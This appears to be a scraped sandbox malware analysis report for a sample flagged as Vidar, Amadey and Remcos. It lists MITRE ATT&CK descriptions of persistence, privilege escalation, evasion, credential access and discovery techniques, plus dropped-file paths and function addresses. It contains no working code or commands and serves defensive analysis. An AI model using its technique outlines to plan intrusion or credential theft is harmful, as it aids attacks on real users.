Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yaALNupJCH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: Amadey

Threatname: Remcos

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\12600711246403711407151220

C:\ProgramData\23870232221971761076349822

Windows Analysis Report
yaALNupJCH.exe

Function 00CB5E90 Relevance: 32.1, APIs: 12, Strings: 6, Instructions: 566
COMMON

Function 00CB34C0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 144
injectionthreadmemoryCOMMON

Function 00CB4210 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 401
libraryloaderCOMMON

Function 00CB3680 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 359
COMMON

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre